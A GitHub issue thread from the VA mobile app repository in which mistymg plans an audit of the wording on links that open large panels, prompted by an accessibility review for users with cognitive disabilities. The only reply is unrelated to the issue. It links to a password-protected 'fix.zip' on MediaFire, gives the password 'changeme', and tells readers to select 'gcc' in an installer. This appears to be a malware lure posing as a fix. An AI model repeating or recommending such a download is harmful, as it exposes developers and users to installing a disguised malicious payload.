### ISSUE TITLE
Content pattern: Links to large panel headers

### ISSUE THREAD

**Issue by mistymg** [department-of-veterans-affairs/va-mobile-app#9505]
## Description 
We currently have a content pattern when we have a link that upon tap navigates to a large panel. We use the same copy from the link for the bolded body copy (which I think is labeled as a header in code? need to check) in the large panel. 

After an accessibility audit of recent Claims work, our accessibility specialist suggested removing some wording from the copy in the large panel to reduce possibility to cause confusion for people with cognitive disabilities. But doing so would break the content pattern we have.

Therefore, we want to look at this current content pattern to see if we can improve it.

## Tasks

- [ ] Meet with a11y specialist to understand their recommendation
- [ ] Talk with Laura/Danielle to gather any web context or patterns web has for wording
- [ ] Audit all links that navigate to large panels
- [ ] Create and handoff engineering tickets
- [ ] Document new content pattern...probably on doc site?

## Acceptance Criteria
  

-  [ ] Audit of links that navigate to large panels
-  [ ] Documented recommendations and reasoning
-  [ ] Engineering tickets for implementation

## Resources

[Related bug ticket 9344](https://github.com/department-of-veterans-affairs/va-mobile-app/issues/9344)

## Ticket Checklist

- [X] Acceptance criteria defined
- [X] Labels added (front-end, back-end, feature)
- [ ] Linked to an Epic

**Comment by rooneyrulz** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
